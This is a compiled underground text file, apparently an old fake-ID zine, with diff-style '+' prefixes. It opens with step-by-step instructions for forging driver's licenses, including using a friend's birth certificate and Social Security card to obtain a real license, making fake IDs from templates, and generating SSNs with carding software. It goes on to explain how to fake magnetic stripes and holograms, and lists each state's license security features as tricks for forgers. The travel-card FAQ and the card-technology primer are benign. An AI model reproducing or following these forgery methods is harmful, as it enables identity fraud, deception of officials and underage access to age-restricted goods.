+Get the picture. BUT if you can make a Fake ID you can keep the stuff. You can be 17, 18, or even 21.
+Can't I just buy one?
+Yes, you can! BUT there are ways that are Cheaper, Less Risky, More Realistic, and If YOU make them,
+then you can sell them and make money!
+Who Makes The Best?
+Your local Tag Agency, you know the place where they make the REAL ones. Thats right you to can
+have an ID that will fool everyone, EVEN THE COPS! How do you conveince them to make you a fake
+ID?? YOU DON'T!! Simply go to friend of Legal age (If your 14 youll NEVER pull off 21!) and borrow
+there Social Security Card and Birth Certificate This works in like 40 states IT WILL NOT WORK IN
+CALIFORNIA! In California they require a fingerprint!
+Want To Make Your Own?
+Of course you do thats why your reading this Article!! This is a little more tricky. Here it goes...
+THINGS YOULL NEED:
+TEMPLATES
+COREL PHOTO PAINT / DRAW
+
+PHOTOSHOP
+TELETYPE FONT
+TIMES NEW ROMAN FONT
+A COLOR PRINTER (PREFERABLY LASER)
+A SMALL PHOTOGRAPH OF YOUR SELF
+AN IMAGINATION
+1. Find a Template, always the hardest part.
+2. Open your template using Corel Photo Paint or Adobe PhotoShop
+3. Most of these Template don't already have any Text if they don't SKIP THIS STEP!
+A) Select Draw start line and appropriate size (usually about 24) Erase the pre-recorded info
+B) Proceed to step 4
+4. FONT! Use Teletype or some other font that resembles a type writer or Dot Matrix printer. THIS IS
+VERY IMPORTANT!
+5. FILLING IN THE BLANKS: Now for the Text THIS IS THE MOST IMPORTANT STEP! Use you
+REAL height and Weight. MAKE SURE YOU LINE THESE UP EXACTLY!!!
+6. NAME, ADDRESS, AND SSN. To generate SSN numbers I recommend a Carding Prom such as
+Credit Wizard or FakeID.exe. FakeID is a better program but it IS NOT IN ENGLISH. Make up a
+Birthday. DO NOT USE YOUR OWN INFO!!
+7. PRINTING. Use as good a printer as possible this will take some time paper and ink to get the sizing
+right size it to match your REAL ID.
+8. The BACK. I don't have any back templates scan the back of yours or copy the text be sure to but
+change the state names!
+9. LAMINATING You will need a pouch laminator, but you don't have one and you don't have $2,000 to
+cough up. GET A FRIEND AT BLOCK BUSTER! Or Use a Razor to Open your Block Buster Card and
+insert Fake ID.
+10. USE. THERE ARE SEVERAL TRICKS TO USING IT.
+A) It werks best at night in not well lit places.
+B) COPS ARE TRAINED! You can't fool a cop
+C) MOST WALLETS HAVE AN ID SLOT WITH A THICK VYNIL WINDOW! Use it! It will distort a
+real ID even a little more difficult to see Imperfections
+===============================================
+International ID Cards
+article by {hxxp://www.counciltravel.com/idcards/default.asp}
+{How to Apply for your International Identity Card: hxxp://www.counciltravel.com/idcards/apply.asp}
+IYTC FAQ
+What is the International Youth Travel Card? -
+The International Youth Travel Card (IYTC) is an internationally recognized identification card for
+anyone under 26 years of age who is not a student. The card is administered internationally by the
+
+International Student Travel Confederation (ISTC) and is administered in the U.S. by Council Travel. The
+IYTC in the past has been known as the GO25 Card but its name has been changed to better fit the card.
+I am under 26 years old, but why do I need the IYTC? -
+IYTC is officially endorsed by international organization, national governments and student
+organizations. With the IYTC, you'll have access to special discounts on airfare, accommodations,
+transportation and much more!
+Where can I get a list of these special discounts? -
+Details of the benefits and discounts for the card are outline in the free Z-Card that is distributed with
+each card or visit the International Student Travel Confederation's (ISTC) Web site for specific discounts.
+How long will my Identity Card be valid? -
+The IYTC is valid for one year from the date of purchase.
+How can I purchase the International Youth Travel Card (IYTC)? -
+To purchase the card in the U.S., see the How to Apply page. To purchase an ISIC outside the U.S. visit
+the International Student Travel Confederation (ISTC) web site to find the Issuing Office nearest you.
+What if I'm not under 26 years old? -
+If you are a student, you are eligible for the International Student Identity Card
+If you are a teacher, you are eligible for the International Teacher Identity Card
+{Order Now}hxxp://www.counciltravel.com/idcards/OrderCard.asp?Agree=1&name=go%2B25
+ISIC FAQ
+What is the International Student Identity Card? -
+Endorsed by the United Nations Educational, Scientific and Cultural Organization, the International
+Student Identity Card, often called the ISIC (that's "eye'zic"), was initiated to give traveling students a
+document that would be readily accepted worldwide as proof of their student status.
+I already have a student ID, why do I need the ISIC? -
+Your regular college or university ID won't be readily recognized internationally –and sometimes not
+even understood. ISIC is the world's most widely accepted student identity card. It is issued in over 90
+countries to over 4 million students yearly . With the ISIC, you'll have access to special discounts on
+airfare, accommodations, transportation, basic traveler's insurance and much, much more!
+Where can I get a list of these special discounts? -
+Details of the benefits and discounts for the card are outline in the free, 128-page International Student
+Identity Card Handbook that is distributed with each card. Worldwide discounts are also listed on the
+International Student Travel Confederation (ISTC) web site.
+How long will my 2001 International Student Identity Card be valid? -
+Your ISIC is valid from September 1, 2000 through December 31, 2001.
+How do I purchase the International Student Identity Card? -
+To purchase the card in the U.S., see the How to Apply page. To purchase an ISIC outside the U.S., visit
+the International Student Travel Confederation (ISTC) web site to find the Issuing Office nearest you.
+What if I'm not a student? -
+If you are under 26 and not a student, you are eligible for the International Youth Travel Card (IYTC)
+
+If you are a teacher, you are eligible for the International Teacher Identity Card (ITIC)
+{Order Now}hxxp://www.counciltravel.com/idcards/OrderCard.asp?Agree=1&name=isic
+ITIC FAQ
+What is the International Teacher Identity Card? -
+The International Teacher Identity Card, often called the ITIC (that's "eye'tic") was initiated in 1984 to
+give traveling teachers/faculty a document that would be accepted around the world as proof of teacher
+status. ITIC is administered internationally by the International Student Travel Confederation (ISTC) and
+is administered in the United States by Council Travel. Issued in over 40 countries and endorsed by the
+United Nations Educational, Scientific and Cultural Organization (UNESCO), the ITIC is a basic travel
+document for faculty member at all levels.
+I already have a faculty ID, why do I need the ITIC? -
+ITIC is officially endorsed by international organization, national governments and student organizations.
+With the ITIC, you'll have access to special discounts on airfare, accommodations, transportation and
+much more!
+Where can I get a list of these special discounts? -
+Details of the benefits and discounts for the card are outline in the free International Teacher Identity
+Card Handbook that is distributed with each card. Worldwide discounts are also listed on the International
+Student Travel Confederation (ISTC) web site.
+How long will my 2000 International Teacher Identity Card be valid? -
+The ITIC is valid from September 1, 1999 through December 31, 2000.
+How do I purchase the International Teacher Identity Card (ITIC)? -
+To purchase the card in the U.S., see the How to Apply page. To purchase an ITIC outside the U.S. visit
+the International Student Travel Confederation's (ISTC) Web site to find the Issuing Office nearest you.
+What if I'm not a teacher? -
+If you are under 26 and not a student, you are eligible for the International Youth Travel Card (IYTC)
+If you are a student, you are eligible for the International Student Identity Card
+{Order Now}hxxp://www.counciltravel.com/idcards/OrderCard.asp?Agree=1&name=itic
+==============================================
+Magnetic Stripes
+BR>These only look like the magnetic stipes, they are not working magnetic stripes!
+Ok, what you need to make magnetic stipes is just black elecrtical tape, scissors, and an iron. Now cut the
+tape so it is the width that you want usually about 1/4 of an inch. And cut it the entire length of the card,
+and tape it on. Now this is how the final product will look, but if someone were to examine it they would
+find that the tape is elevated off of the card Now what you need to do is place a soft cloth over the card
+and iron the tape. Waht you want to do is melt the edges of the tape onto the card so that when you run
+your fingers over it you cannot feel the difference.
+Keep at it, this sounds A LOT easier than it really is. and also do in on TOP of the lamination, duh.
+===============================================
+
+ID card Holograms
+article by TopHat
+A hologram can greatly affect the look of an id, since holograms are incredibly hard to reproduce, one
+will almost surely validate the credibility of your card. To make holograms you will need:
+Titanium Dioxide Powder (look in chemistry catalogs,labs, some art stores)
+Acrylic Base (most art supply stores) Razor Blade ( Revco, your friend for life)
+Now mix the powder and base, it be like a paint
+with sparkles in it. Now spread it out over the spot
+where you want your hologram to be, and use the razor blade
+to scrape off the design. Scrap off the paint where you want
+just the card to shine through. If you mess up, scrap it all off
+and start again. Study the hologram you want to duplicate
+throughly so you are able to copy it well. What this basically
+is is just paint that has sparkles in it, and when held at an angle
+will shine, just like a hologram. Do this UNDER/BEFORE you laminate.
+If you plan on mass producing these, I suggest that you make
+a stencil out of cardboard or plastic, it will greatly affect
+the time and the look.
+Holograms peel offs can also be purchased from paper companies, or
+police supply catalogs. These are better looking, easier, cheaper,
+but come only in limited styles (not likely to find state seals and the like).
+other ways are:
+Here's what you do: Take the seal off of the template that you are using. Copy and paste it as a new image
+in the same location that you took it from on the template. (hint: most graphics programs show the
+coordinates of your pointer in the bottom-left corner of the screen) Copy the shape and contents of the
+hologram and paste it exactly where it should be on the new image you have created just like you did with
+the state seal. Once this is complete, print this out on a transparency sheet. (I usually print out a whole
+page them at a time so I don't have to waste transparency sheets) The easiest way the cut-out the
+transparency is to lay it right on top of your printed license (paying attention to the location of the seal
+and the hologram image) and cut around the edges of the license with an Exact-o knife. Once you have
+the transparency sheet cut-out, here's how you turn the hologram into a believable one: Go to your local
+office supply company. (Officemax is great) Look for presentation foil sheets ( they are usually right next
+to the laminating supplies ). The come in a variety of colors, find one that matches the color of your
+state's hologram. Gold colored works for most holograms. Cut a piece of foil big enough to cover your
+hologram and then place it in a carrier and run it through your laminator. When it comes out, peel off the
+foil paper and you'll be amazed at the finished hologram. Put this back on whatever you are going to
+laminate and then put the whole thing in a pouch a laminate it. You will never notice the transparency
+sheet being there. Don't be cheap and use an iron to laminate, spend $50 and buy one (use a minimum of
+5 mil laminating pouches) One more thing, Scotch makes a restickable adhesive glue stick so you can
+paste a remove your photo, or whatever, as many times as you want to ensure that you get the photo on
+straight. (to paste the photo on --if using Polaroid's) IMPORTANT: Make sure to let the Polaroid's sit for
+at least 30 minutes before you peel the back layer off of them. If you don't give it time, pieces of the
+Polaroid ink will stay on the backing paper leaving you minus facial features. But, make sure you take the
+backing off of the Polaroid or else it won't look genuine, the picture will stick out.
+or...
+
+First your going to need the real thing if you can get a holo. Go to walmart or any Photoshop, and invest
+in some of the 3D Film. Now you can buy the cheap kind that comes in the disposable camera or you can
+buy the real stuff at most photoshops. As always, the more money you spend usually the better its gonna
+look. Now while your there look for the transparency paper. any transparency plastic sheets will work, but
+if you buy the ones from the photoshop your chances of a better look HOLO go up.
+Once you got your supplies, expose a whole role of film on your holo. 3D doesnt always come out the
+greatest so you'll probably get 4 or 5 good ones out of a role of film. Now when you go to get these
+developed you want to get them printed, and you want to keep the negatives. This way you can find the
+best ones and know which negative they corespond to. When you choose your best negatives, Here comes
+the hard part.
+You need to have some sort of access to a dark room, and hopefully you know how to develop pictures.
+Any old Darkroom will work. As long as you have taken photography or know the basic gist of it, you
+will be fine. Now what what you want to do is make your own prints on the transparency sheets. This is
+tricky, becuase if you move it at all when it is being developed the HOLO's will blur. So basically get a
+bunch of time and a bunch of negatives and a bunch of transparency sheets. Try to have someone who
+knows hwo to develop film with you. This helps. Also when you ary drying the photo try to keep all light
+away from it. when you normally print you can turn the lights on a and let them dry. With holo's let them
+dry completely in the dark. Dont use a hairdryer or anything to speed the process up, that will fuck things
+up. be prepared to spend some time before you get the hang of it.
+==============================================
+Primer on Electronic Card Technologies
+article by CyberChix
+Yesterday, I used a magnetic stripe credit card to pay for a purchase at a local clothing store; at the same
+time, I presented my storage-only contact card to add my frequent buyer points. Next, I used my memory
+chip with register contact card to make a prepaid phone call.
+Later in the day, I stopped at the bank and used my microprocessor contact card to withdraw some money
+from my checking account. (Thankfully, I remembered my PIN number.) Then, I stopped by the daycare
+to pick-up my son; I used my contactless card to enter the building.
+Next, we entered the transit station and caught the bus to head home. I am so glad I finally got those
+combi cards to pay our toll. It sure makes getting around quick, simple and hassle-free.
+I needn’t bore you with anymore details of my life. But, I’m sure you get the picture.
+How many times today did you use an electronic card? What type of technology did it employ? What
+purpose did the card serve?
+ELECTRONIC CARD TECHNOLOGIES IN TODAY’S MARKETPLACE
+Let’s take a quick look at the electronic card technologies being used in today’s
+marketplace and what applications commonly use these technologies. With a basic
+understanding of how these different types of cards work, you will begin to see the
+endless possibilities for their application.
+• MagneticStripeCards
+• Memory and Microprocessor Smart Chips
+• ContactCards
+• ContactlessCards
+• Hybrid/Twin Cards
+• CombiCards
+• Proximity Cards
+• OpticalCards
+
+Magnetic Stripe Cards
+Magnetic stripe cards are everywhere. This well-established technology is common in industries with
+low- to medium-data storage needs.
+The most common applications for magnetic stripe cards are financial cards, transit tickets, and ID cards.
+• Bank credit and debit cards.
+• Prepaid telephone and vending cards.
+• Subway, railroad, bus, toll road, and airline cards.
+• Driver licenses, employee ID badges, membership cards, and door keys.
+Magnetic stripe cards have a black or brown magnetic stripe made up of magnetic particles of resin.
+These types of cards can be either low-coercivity (LoCo) or high-coercivity cards (HiCo).
+Coercivity is the ability of a property to resist demagnetization. It is measured in oersteds (Oe). The
+material used for the particles determines the coercivity of the stripe: low- coercivity stripes at 300 Oe are
+made of iron oxide and high-coercivity stripes at 2750 to 4000 Oe are usually made from barium ferrite.
+The higher the coercivity, the harder it is to encode information — and to erase information.
+Memory and Microprocessor Smart Chips
+Before we take a look at the many types of smart cards, it’s important to understand the various chips
+found in these cards. The chips used in contact, contactless, hybrid/ twin, and combi cards fall into two
+categories: memory and microprocessor.
+Memory Chips
+A memory chip is similar to a small floppy disk. This type of chip primarily stores information, access
+control, or a value that can be “spent.” It holds anywhere from 103 bits to 16,000 bits of data.
+Memory chips are less expensive than microprocessors, but they also offer less security because they
+depend on the security of the card reader. Because of this, memory chips are ideal for use in applications
+requiring low- to medium-security. Memory chips can be divided into two categories: Storage-Only and
+Memory Chip with Register.TheStorage-Only Memory Chip has rewriteable memory. It is often used in
+loyalty applications to store a buyer profile. The buyer earns points as they spend money and these points
+are later redeemed for various rewards. The Memory Chip with Register begins with a value that
+decreases with use. It is not
+rewriteable; once the value is exhausted, the card is discarded. The most common applications for this
+chip are prepaid telephone and vending cards.
+Microprocessor Chips
+A microprocessor chip can add, delete, change, and update information. It is
+basically a computer with an input/output port, operating system and hard disk.
+Microprocessor chips come in 8-, 16-, and 32-bit formats with data storage
+capacities ranging from 300 to 32,000 bytes.
+Microprocessor chips offer a high degree of security to the user. They have the
+ability to verify the cardholder with a PIN (or other secret code). Banking,
+identification, healthcare, and other industries that require high security are
+currently utilizing microprocessor cards.
+Contact Cards
+
+A contact card has a gold chip embedded in the card; the dimensions and location of the chip are standard
+and are defined in ISO 7816-2. This kind of card requires insertion into a smart card reader and a direct
+connection with the physical contact points on the card to transmit data. Contact cards are used frequently
+in banking, communications, healthcare, loyalty, and storing automotive service histories.
+Contactless Cards
+Contactless cards have an antenna coil and a chip embedded in the card. This type of card must pass
+within varying degrees of proximity to a smart card reader. The embedded antenna communicates with a
+receiving antenna at the transaction point. Access control, student identification, electronic passport,
+vending, parking, and toll are common applications for contactless cards.
+• Immediate proximity smart cards must pass less than 1 millimeter from the reader and be precisely
+aligned.
+• Close proximity smart cards must be between 1 and 2 millimeters from the reader in a specific
+orientation.
+• Remote coupling smart cards can function in a range from a few centimeters up to 3 to 5 meters from
+the reader in any orientation.
+Hybrid/Twin Cards
+A hybrid/twin card has two chips embedded in it: a contactless chip and a contact chip. The chips may be
+memory or microprocessor chips. The contactless chip is for applications demanding fast transaction
+times — like mass transit. The contact chip is used in applications requiring higher security. The two
+chips are not connected to each other. Instead, one chip serves the consumer needs and the other the card
+issuer needs. This type of card also offers a temporary solution for contact card systems switching to
+contactless.
+Combi Cards
+The combi card — also known as a dual-interface card — offers a contact and contactless single chip.
+This is a popular form of smart card because it extends ease-of- use to both the card issuer and the
+consumer. Mass transit is expected to be one of the more popular applications for the combi card. In the
+mass transit application, the contact interface may be used to place a cash toll value on the combicard
+whilethecontactlessinterface isused to remove atollvalue.
+Proximity Cards
+Proximity cards utilize contactless technology. They are growing in popularity because of the
+convenience they offer markets like identification, mass transportation, security, and access control.
+Contactless cards, hybrid/twin, and combi cards are examples of different types of proximity cards.
+Here's how they work:
+• An antenna is embedded in the card.
+• The card passes within range of a reader, which activates the reader. Immediate proximity cards must
+pass less than 1 millimeter from the reader and be precisely aligned. Close proximity cards can be read up
+to 10 centimeters from the reader in a specific orientation.
+Vicinity cards can function in arangefrom30to70centimetersfromthereader in any orientation.
+• The embedded antenna communicates with a receiving antenna in the reader. The reader then sends the
+data to the host computer for processing. Proximity card technology is employed in a variety of markets
+including identification, analysis, transportation, distribution, industrial, security, and access control.
+Optical Cards
+Optical cards employ a CD-ROM type of technology to store information. A section ofthe lasersensitive
+mediaislaminatedinto acardand isused to storedata.The mediaisawrite once read many(WORM)media.
+
+An optical card stores between 4 and 6.6 MB of data. This makes it an ideal carrier for graphics such as
+photographs, logos, fingerprints, x-rays, etc. Data is encoded in a linear x-y format. ISO/IEC 11693 and
+11694 standards cover the details. Optical cards currently are utilized to store prenatal-care records,
+medical images, and personal medical records.
+They are also commonly used in the following applications:
+• High-security drivers’ licenses and access/entry cards.
+• Auto repair/warranty records.
+• Secure bank debit cards.
+• Immigrant ID cards.
+• Automated cargo manifests for the Department of Defense logistics.
+=============================================
+Guide to US & Canadian
+Drivers License Security Techniques!
+article by {Egg}
+The following is a state by state (and Canadian province) list of tricks that are used on drivers licenses to
+prevent forgery.
+One other thing. One the most common and easy to use security checks in use today is the Soundex
+system. You will notice that many states incorporate this into their licenses. I feel that everyone interested
+in the topic covered by this file should be made aware of this systems simplicity and also it's danger (to
+the unknowing), so I have included, at the end of this file, an explanation of the Soundex system.
+- UNITED STATES LICENSES
+- CANADIAN LICENSES
+- SOUNDEX SYSTEM
+------------------------------------
+UNITED STATES LICENSES
+Alabama:
+This license is a photo ID card laminated in plastic. The driver's photograph is on the lower left corner,
+and overlapped by the state seal. The drivers license number and birth date are embossed at the top, and
+license of minors under 21 are further identified by a star embossed after the birth date.
+Alaska:
+This license is encased in plastic. If needed, "CDL" and the appropriate class appear in the class box. The
+manufacturer is Polaroid.
+In the Minor's license, a red vertical "ALASKA" is on the left side, "UNDER 21" on the right side of the
+laminate and "UNDER 21" or "*U21*" is below the photo. Prior licenses have birth date only.
+The state seal and camera number overlap the photo. There is a raised hologram on the current license.
+The license number is up to 7 digits, without spacing, and it is not coded.
+The license expires on the person's birthday five years after it has been issued. The certificate of the
+
+extension, found on the back of the license, can extend the expiration for one 5-year term for drivers
+under the age of 69. The operator must be atleast 16 years old.
+This license is also a photo laminated type, but the lettering on it may be typewritten or "computer type,"
+which offers the forger a choice. The signature of the Commissioner overlaps the photo. An additional
+safeguard is that the state seal overlaps the driver's signature.
+Arizona:
+This is a polyester photo ID card, but it is not laminated. The state seal is on the front of the license
+surrounded by a printed orange pattern which overlaps the type. The Assistant Director's signature is on
+the bottom. The driver's name, address, and other data may be typed or written in by hand.
+Arkansas:
+The current license is in credit card style with a ghost image and a yellow header. It has a 2d bar code and
+magnetic stripe on the back. Prior licenses are digitized with magnetic stripe on back. For CDL, blue map
+enclosing "CDL" and "Commerical drivers License" at right. "Commercia Drivers License" in green ink
+for prior CDL
+Current license has a red header, a red border around the photo, birth day in a red box, "UNDER 18" and
+"UNDER 21" statements. Prior license uses same statements
+This is a laminated photo ID, using the state seal overlapping the photo as a safeguard.
+California:
+The two newest formats have a pattern of the state seal and the DMV logo, which is in an optically
+variable gold ink in the newest format. The license may have a bar code and a magnetic stripe on the
+back, or just a magnetic stripe. The prior license has a retroreflective laminate on the front. The CDL has
+"COMMERCIAL DRIVER LICENSE" in brown.
+The Minor's license has the photo on the right. One license has "Provisional" and "Age 21" highlighted in
+blue or red color, respectively. Another license has "PROVISIONAL UNTIL AGE 18 IN (date)" in white
+letters on a blue bar, or it may have "PROVISIONAL UNTIL AGE 18" in red letters, for those under 18
+years of age. The under 21 licenses have "AGE 21 IN (date)" in white letters over a red bar or in red
+lettering, or "UNDER 21 UNTIL (year)" in red or black.
+One license has the state seal and DMV logo in an optically variable gold ink, microprinting and a
+secondary photo. Another license has a translucent hologram of the state seal and the DMV logo. Prior
+licenses have hidden reproductions of the state seal and "California" on the surface.
+The license number has one letter, and 4-7 digits, which are unspaced and uncoded.
+The license is valid for 4 years for an original license, or 4 or 5 years for a renewal license, which expire
+on the birth date. An accompanying certificate can extend the license for two 4 or 5 year terms. The
+operator's minumum age is 16.
+This license is photograpghic, with a high-tech lamination the front. Type may be typewritten or
+computer type. The state seal and the name "California" are hidden in the laminate.
+Colorado:
+One license is made of durable plastic with a scenic backdrop of mountains, a digital photo at the left, and
+a ghost image on the right. Another license is photographic and encased in plastic. "COMMERCIAL
+DRIVER LICENSE" for the CDL is below the state heading for the first license, and in a yellow band
+
+below the heading for the second. The first has a magnetic stripe and 2D bar code on the back, and the
+second just has the magnetic stripe.
+The Minor's license is in the vertical format, and has "UNDER 21" in red above the photo, along with a
+ghost image on the right. A probationary license has a gradient gray background. The other license has a
+profile photo prior to 8/94, but now features a full-face photo. "UNDER 21" in a yellow bar, or "UNDER
+18" in a red bar is on the right. The prior license has license numbers prefixed with an M for those under
+18, and P for those between 18-20, along with "UNDER 18" or "UNDER 21" in a box to the right of the
+license number.
+The first license has the state seal in a continuous row across the center, and the other license has a row of
+state seals across the bottom. Prior licenses have the state seal at the top of bottom edge of the photo and
+data area.The license number has 9 numbers, and prior licenses usually have 1, but up to 5 letters and up
+to 6 digits.
+The adult licenses are valid for 5 years, and for 4 years if commercial licenses, which all expire on the
+birth date. Under 18 and Under 21 licenses expire 20 days after the 18th and 21st birthdays, respectively.
+One-year extensions are available for out-of-state renewals, and 2 extensions are available for out-of- the-
+country applicants. The operator's minimum age must be 16.
+This is a photo-Id with a polycarbonate (Lexan) coating. This makes it very durable, as well as unusually
+flexible. The material gives it a different "feel" from most photographic materials. The state seal is in the
+center, and the Director's signature is in black.
+The Colorado Id has about 5 holograms on it, all on the bottom of the ID. They are not true holograms,
+instead if you tilt the Id you will see these five holograms that simply look like gold. There is not a full
+color spectrum in the hologram. The hologram is of the state seal, and each one is a little more then a half
+inch in high.
+A trick used on the Colorado Id is that of the information field "Hair." On most Ids it is actually spelled
+'Hair', but instead on the Colorado it looks to be spelled with an 'e' instead. So sometimes bouncers will
+look at this and if it looks like it is spelled 'Hair' then they will pull out the Id book.
+Connecticut:
+This license is laminated, has a digitized shadow image of the driver, and the commisioner's signature
+overlapping the photo, which may be omitted on some. The CDL has "COMMERCIAL/DRIVER'S
+LICENSE" in green on the upper-right corner.
+The Minor's license has "UNDER 21 UNTIL XX-XX-XX" in red over the picture instead of the two flags
+commonly seen on regular licenses.
+The current license has a row of state seals at the bottom of the license, and an outline of the state with the
+state name diagonally through it, which is visible under black light. Another version has a rectangular
+security feature which overlaps the photo, ghost image and the data area. Both versions have authorizing
+signatures overlapping the photo, even though some issues of the other version failed to include this.
+There is also a ghost image. Finally. the state seal and camera code are visible over the lower right corner.
+The license number is 9 digits without spacing. The first two digits are 01-12 according the month of the
+driver's birth if the birth year is odd, or 13-24 if the birth year is even.
+The license is valid for 3-5 years, and expires on the person's birthday. The operator's minimum age is 16.
+This is a Polaroid photo card, laminated in plastic with the gold printing "CONNETICUT" on the plastic.
+A gold "Y" is in the typed area for minor's licenses. There are several other tricks and kinks to this
+license:
+The Commissioner's signature is on the edge of the photo. The first two digits of the nine-digit license
+
+number are coded. For drivers born in odd years, the first two numbers denote the month of birth by the
+numbers 01-12. Those born in even years have the numbers 13-24 to denote birth month.
+Delaware:
+This is also a photo-ID with lamination. The safeguards are the
+Director's signature on the edge of the photo, the date and fee at the bottom, and a red background for the
+photos of those under age 21.
+District of Colombia:
+The proposed license is a credit card style with a blue header bar, which is not embossed. The driver's
+photo is on the left with a shadow image on the right side for all licenses. The current license is
+photographic and encased in plastic. "CDL" appears in the type box on both licenses is applicable.
+The Minor's proposed license will be in the vertical format for those under 21. The graduated license will
+be issued to those under 21. The current license has a profile photo used for those under 21. Restriction 3
+is applied to those under drivers under 18.
+The proposed license has a security overlay with "WASHINGTON DC A CAPITAL CITY". The current
+license has an authorizing signature above the photo, a District seal in the data area, and a DC outline and
+ussuing office number which overlaps the photo. The District of Columbia emblem (3 stars above 2 bars)
+is in red at the bottom right. "WASHINGTON DC A CAPITAL CITY" is in a gold, repetitive pattern.
+The license number is the social security number or an assigned number consisting of 7 computer-
+generated digits.
+The license is valid for 4 years from the date issued, and may be valid for 5 years, expiring on the birth
+date. The operator's minumum age is 16.
+DC issues photo-laminated ID with the Administrator's signature or the outline of the district map on the
+edge of the photo. The license number may be the Social Security number or one assigned by the issuing
+agency. The trick in this license is the code number "3" in the space for "Restrictions" to identify minors
+under 18.
+Florida:
+This license is made of PVC and has a holographic overlay and a magnetic stripe on the back. Prior issues
+are encased in plastic with variations in the statement above the signature. The CDL has "*CDL*" below
+the license number in the previous issue, and the current issue has "CDL" followed by the class on a blue
+bar on the left.
+The Minor's license has "UNDER 21 UNTIL (date)" in a red bar below the photo. Prior issues have a
+yellow photo backdrop and after July 1989, a red vertical "UNDER 21" overlaps the photo's right edge. A
+vertical license is currently under consideration for 2000.
+The current license has a holographic overlay of "Florida" and the state outline. Previous issues have the
+state seal and the camera number overlapping the photo, along with a vertical "FLORIDA" visible in
+ultra-violet light. Another issue has a state seal and a radiating security pattern in the data area.
+The license number has 13 characters using the Soundex system. The first is the first letter of the driver's
+last name. The next 3 digits are the last name in Soundex code, and the next 3 are department coding. The
+next two are the year of birth, the next three are the coding of the birth date and sex, and the last digit is a
+check digit, which may not appear. Previous issues have 12 characters, set up as 4-3-2-3 also beginning
+with the first letter of the last name.
+
+The license is valid for 4-6 years, expiring on the birthday with an 18-month early renewal option. A
+sticker can extend the license another 4 years if the license was issued between November 1985 and
+November 1989. The 4 and 6-year extension program was reinstated in 1992. The non-digital licenses can
+have two extensions. The operator's minimum age is 16.
+This state issues photo-laminated ID with the state seal and camera number overlapping the photo. The
+license number follows the Soundex system and begins with the first letter of the last name and looks like
+this: J123-123-39-123. The two digit group is the birth year. An additional trick is that minors under 21
+have a yellow background on their photos. The most difficult to overcome trick used with this license is
+state seals printed in ink visible only under ultraviolet light.
+Georgia:
+The license is photographic and laminated. Current licenses have a bar code on the back and a
+holographic patch in the front. On prior licenses, the photo runs from top to bottom on some issues, and
+the data box titles may vary. Current licenses have "Georgia" followed by "COMMERCIAL DRIVER'S
+LICENSE" in a goldish- yellow. Prior issue has a yellow "GEORGIA" followed by "COMMERCIAL
+LICENSE" or "COMMERCIAL DRIVER'S LICENSE" in smaller black letters with the same words in
+yellow across the data box.
+The Minor's license has "UNDER 21" vertically to the left of the photo, the 21st birthdate, "UNTIL (21st
+birthdate)", a picture border, and heading all in red. The prior issue had "UNDER 21" in red on the front.
+The current license has "Georgia" in a holographic patch over the driver's date of birth and the state seal.
+The prior issue has the Commissioner's and the Governor's signatures, and the state seal overlapping the
+photo.
+The license number is up to 9 digits, and not coded. The Social Security number or a control number is
+used.
+The license is valid for 4 years, expiring on the birthday. An honorary veteran's license may be updated
+by having the department sticker attached to the back. The operator's minumum age is 16.
+This is a photographic laminated card with the blue state seal on the front, surrounded by a pattern of
+orange lines. The safeguards include both the Governor's and Commissioner's signatures, but not
+overlapping the photo. Drivers under 20 have a red bar at the top of the card.
+Hawaii:
+This license is a plastic card with a rainbow on the front. The CDL has "CDL" in red letters below the
+"CTY" field at the right side of the license.
+The Minor's license has "UNDER 21 UNTIL (month-day-year of 21st birthday)" in red below the license
+number.
+The current license has a holographic overlay of a hibiscus flower and "Aloha State" repeating over the
+face of the license. The prior license has a hologram with "ALOHA STATE" over the date of birth which
+encroaches into the picture area.
+The license number is the Social Security number. The license number may change to an alternative
+system beginning in 2001 if pending legislation approves it.
+The license is valid for 6 years for those 18-71 starting July 1997, expiring on their birthday. The license
+is valid for 4 years for drivers 15-17, and for 2 years for drivers 72 and older. Before 1997, people
+between 15-24 and adults 65 and older were issued licenses valid for 2 years, and all others expired after
+4 years. The license can be renewed 6 months prior to expiration, even making some licenses (depending
+
+on birth date) valid for over 6 years. The operator's minimum age is 15, which may change to 16.
+This looks more like a bank card than the typical drivers license because the data is embossed. The photo
+is at the upper right, embedded in the plastic card. An additional 10-digit number is at top right, above the
+photo, and minors under 17 are identified by having their photos in profile.
+Idaho:
+This license is photographic and encased in plastic. Older issues have date in boxes. The CDL has a
+notation above the signature, or "SEASONAL CDL" printed vertically in red on the left and right sides of
+the laminate.
+The Minor's license has "UNDER 18 UNTIL (date)" in the donor area for those under 18 and "UNDER
+21 UNTIL (date)" below the birth date for those under 21, starting January 2000. "UNDER 21" is also
+stamped in red to the right of the address for drivers under 21. Previous issues might not have the red
+stamp and some of the oldest issues may have profile photos. Drivers who are 15 are restricted to only
+driving during daylight until they are 16.
+There is a repetitive gold state seal on the license, and the camera number splits the line on the right edge
+of the photo. An additional number must appear below the driver's license number.
+The license number has 9 characters: 2 letters, 6 numbers, and 1 letter, starting May 1993. Before that
+date, the Social Security number or an assigned number, starting with 910, 920, or 940 and then 6 digits,
+was used.
+The license is valid for 4 or an optional 8 years for those between 21 and 62, starting January 2000.
+Before that date, licenses are valid for 4 years. If a renewal sticker is attached to the back of an expired 4-
+year license, the license is extended for one more 4-year term. A separate 1-year extension is available.
+The operator's minimum age is 15 with driver training, with a daylight restriction until 16.
+This license is a laminated Polaroid with a gold pattern in the lamination. Minors under 19 are identified
+by a photo in profile, instead of full-face. The license number may be the Social Security number.
+Otherwise, it's 9 digits beginning with "910" or "911". Only the Social Security number is hyphenated.
+Illinois:
+The current license is digitized with a retroreflective hologram. The CDL has a notation above the photo.
+The Social Security number may appear beside the birth date on the current license or above it for prior
+issues, but this is optional.
+The Minor's license has a red headbar, and a red aura around the state seal. "UNDER 21 UNTIL (date)" is
+in the headbar, and the birth date is blocked in red. Prior licenses have a red photo backdrop, red bars at
+the top and bottom (in the laminate) and "UNDER 21" on the right side of the laminate and on the back
+for those under 21.
+Current licenses have a hologram that says "A Safer State with .08" repeating across the bottom, and .08
+is inside the state outline. Prior licenses have a raised hologram over the birth date area and the photo
+edge. Prior licenses have a small repetitive pattern of "ILLINOIS" across the data area.
+The license number is the first letter of the last name, followed by 11 digits. XXX for the last name
+coded, XXX for the first name and middle initial coded, XX for the year of birth not coded, and XXX for
+the day and month of birth and sex, which might be different if two drivers have the same name and birth
+date.
+The nonrenewal licenses are valid up to 5 years, and the renewals are valid for 4 years, expiring on the
